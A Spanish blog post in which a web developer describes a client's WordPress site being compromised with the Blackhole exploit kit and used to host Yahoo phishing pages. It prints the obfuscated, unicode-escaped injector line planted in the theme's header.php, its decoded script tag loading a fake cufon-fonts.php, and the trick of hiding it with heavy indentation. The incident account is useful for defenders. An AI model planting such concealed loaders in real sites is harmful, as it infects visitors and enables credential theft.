Ataque con Blackhole Exploit kit en un blog con WordPress

Pues sí, me ha ocurrido. Alguien se ha entretenido en entrar en el servidor, modificar unos archivos y conseguir tener el control total sobre los archivos en la carpeta raíz de uno de los clientes al que le había instalado un blog con WordPress.

Con ello consiguieron instalar unos archivos .html similares a la página que pide la password en Yahoo y utilizarlos para enviarlos por email y robar passwords… la bomba!

La parte buena es que el hosting lo ha detectado y ha bloqueado la web. La mala es que Google le ha bloqueado el sitio al cliente y que he tardado bastante tiempo en encontrar donde se había alojado el código malicioso. Pero me fueron de gran ayuda los logs del servidor. Así que problema resuelto.

Lo comparto aquí porque me quedé alucinado de la potencia del programa que instalaron y la forma en la que lo hicieron. Solo sé algunas pequeñas cosas que dejaron como rastro pero aquí lo pongo.

No sé exactamente qué agujero de seguridad tenía la instalación de WordPress, pero seguramente muchos porque no había tocado nada en los permisos de las carpetas, ni me había preocupado por la visibilidad de los archivos ni nada. Seguro que a partir de ahora no lo volveré a hacer jejeje.

Bueno, pues una de las primeras cosas que hicieron fue modificar el archivo header.php  del tema que estaba cargado, incluyendo esta línea:

[codesyntax lang=»javascript»]

document.write("\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u002F\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u002F\u0077\u0070\u002D\u0069\u006E\u0063\u006C\u0075\u0064\u0065\u0073\u002F\u0054\u0065\u0078\u0074\u002F\u0044\u0069\u0066\u0066\u002F\u0045\u006E\u0067\u0069\u006E\u0065\u002F\u0063\u0075\u0066\u006F\u006E\u002D\u0066\u006F\u006E\u0074\u0073\u002E\u0070\u0068\u0070\u0022\u003E\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");/*

[/codesyntax]

Era la primera línea del archivo, solo que no se veía porque la habían indentado con un margen izquierdo enorrrrrrme, para que pasara desapercibida al buscar caracteres extraños con el editor. Y traducida a «cristiano» es:

[codesyntax lang=»html4strict»]

<script type="text/javascript" src="/wp-includes/Text/Diff/Engine/cufon-fonts.php"></script>

[/codesyntax]

La encontré gracias a Chrome, que decía que se estaba cargando un archivo llamado cufon-fonts.php y que no existía. No existía porque lo borré del hosting por las alertas que recibí indicando que estaba infectado con BlackHole.

Sin embargo, yo no uso cufon fonts, así que.. raro raro… Esta es la captura de pantalla del Chrome

En la imagen de arriba está el archivo nada más abrirlo y en la de abajo se ve lo que aparece si hacemos un scroll a la derecha….esa línea de código es la que carga el Blackhole en la cabecera de la web.

Lo que no encuentro por ninguna parte y es una pena son los archivos que borró el servidor, entre ellos el código de ese archivo. Pero seguiré buscando y ya os contaré más.

Espero que pueda servir de ayuda a alguien o al menos como curiosidad

About Post Author

pablocia

Lo mejor para observar la corriente es no estar en ella, así que toma distancia, piensa y verás la solución. <a href="https://es-es.facebook.com/visualxtudio">Facebook</a>
Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %

Average Rating

5 Star
0%
4 Star
0%
3 Star
0%
2 Star
0%
1 Star
0%

One thought on “Ataque con Blackhole Exploit kit en un blog con WordPress

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Entrada anterior Live.js – Para ver los cambios mientras estamos diseñando
Entrada siguiente Error al instalar Prestashop: No encuentra el archivo config/config.inc.php